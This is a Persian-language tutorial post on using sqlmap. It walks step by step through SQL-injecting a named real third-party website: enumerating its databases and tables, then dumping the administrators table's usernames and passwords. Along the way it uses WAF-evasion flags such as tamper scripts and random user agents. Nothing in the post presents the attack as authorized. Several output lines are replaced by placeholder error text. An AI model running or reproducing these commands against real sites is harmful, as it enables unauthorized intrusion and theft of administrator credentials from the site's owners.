درخواست های ارتباط
جستجو
لیست دوستان من
صندوق پیام
همه را دیدم
  • در حال دریافت لیست پیام ها
صندوق پیام
رویدادها
همه را دیدم
  • در حال دریافت لیست رویدادها
همه رویدادهای من
تخفیف های وب سایت
همه تخفیف ها

عضویت در

کانال تلگرام

توسینسو

اطلاعات مطلب
مدرس/نویسنده
محمد ولی الهی
امتیاز: 191
رتبه:713
0
4
0
11
تاریخ 18 ماه قبل
نظرات 0
بازدیدها 314
آموزش کار با sqlmap


خب اول از همه‌ باید گفت که این برنامه در

سیستم عامل لینوکس قرار دارد❗️❗️

💢خب بریم سراغ آموزش💢

اول Terminal رو باز میکنیم

بعد در آن تایپ میکنیم sqlmap

برنامه بالا میاد و میبنید که به صورت کامندی

هستش❗️(متنی)

خب ما یه تارگت داریم اول یه نکته درباره ی

این تارگت بگم ...

این تارگت پابلیک شده ...و چون صفحه که

صفحه ادمین رو کسی نتونسته پیدا کنه

همینجوری مونده📌

Target: http://www.bible-history.com/subcat.php?id=2

حالا باید دستور رو وارد کنیم.❗️توجه کنید❗️

اول باید بنویسیم:

sqlmap -u http://www.bible-history.com/subcat.php?id=2 --dbs

در بالا -u به معنای url و --dbs به

معنای دسترسی به دیتابیس هستش

خب چیزهای پیچیده تر هم هست مثلا:

sqlmap -u http://www.bible
-history.com/subcat.php?id=2 —level 5 —risk 3 -v 3 —thread 10 —dbms=mysql —identify-waf —tamper between.py —random-agent —dbs —batch



حالا چند تا کلمه مثلا :
*] bible_glossary
[*] bible_history
[*] information_schema
[*] keywords
[*] kidsdict

اینجا باید چیزهایی که به ادمین مربوط میشه

رو انتخاب کرد (bible_history)

خب نحوه وارد کردن دستورش چجوریه

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history --tables

حالا وقتی این دستور رو زدید یه سری چیزا

مثل:
Emails
administrators
| bh_addform
..........

خب قطعا معلومه که باید کدوم رو انتخاب

کنیم(administrators)

خب حالا دستور بعدی چیه؟☹️

sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
bible_history -T administrators --columns

و اینجا چیزهایی مثل :

+------------------+-------------+

متن دارای اشکال می باشد


+------------------+-------------+

متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


متن دارای اشکال می باشد


+------------------+-------------+

میاره حالا شما دستور
sqlmap -u http://www.bible-history.com/subcat.php?id=2 -D
biblehistory -T administrators -C adminusername,admin_password --dump

خب حالا میبینید که user و password

سایت رو بهتون نشون میده
برچسب ها
مطالب مرتبط

در حال دریافت اطلاعات

نظرات
هیچ نظری ارسال نشده است

    برای ارسال نظر ابتدا به سایت وارد شوید